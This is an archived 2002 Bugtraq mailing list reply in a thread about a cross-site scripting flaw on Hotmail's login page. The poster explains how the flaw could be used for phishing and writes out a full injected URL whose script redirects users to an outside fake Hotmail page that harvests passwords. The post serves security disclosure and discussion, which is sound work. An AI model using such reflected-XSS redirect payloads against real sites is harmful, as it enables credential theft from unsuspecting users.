Bugtraq mailing list archives
Re: XSS bug in hotmail login page
From: Muhammad Faisal Rauf Danka <mfrd () attitudex com>
Date: Tue, 8 Oct 2002 05:11:29 -0700 (PDT)
A lot can happen for sure, but i tried one myself, to redirect the request to some other webpage. One can make a fake hotmail page asking for password storing it locally in a text file and then again redirect to the original hotmail page. Usint this method one could steal passwords of hotmail/MSN users. We have all see previously people making hotmail looking page, asking you to first login through it, or asking you to send your login/pass along with the login name with the person you want to get hacked (all nasty scams like that). Now if it is not fixed they will have an easy way to trick them by asking them to visit hotmail new policy at : http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb="><script>location.replace("http://www.ownhomepage.com/frames/hotmailfake.html");</script>&ct=1033054530&_setlang= And then have a fake setup to trick them entering their passwords at: http://www.ownhomepage.com/frames/hotmailfake.html Regards -------- Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Select your own custom email address for FREE! Get you () yourchoice com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
Current thread:
- XSS bug in hotmail login page Peter Rdam (Oct 07)
- <Possible follow-ups>
- RE: XSS bug in hotmail login page Thor Larholm (Oct 07)
- RE: XSS bug in hotmail login page Russell Harding (Oct 08)
- Re: XSS bug in hotmail login page Inderjeet S Sodhi (Oct 09)
- RE: XSS bug in hotmail login page Russell Harding (Oct 08)
- RE: XSS bug in hotmail login page Thor Larholm (Oct 08)
- Re: XSS bug in hotmail login page Muhammad Faisal Rauf Danka (Oct 08)
- Re: XSS bug in hotmail login page Berend-Jan Wever (Oct 08)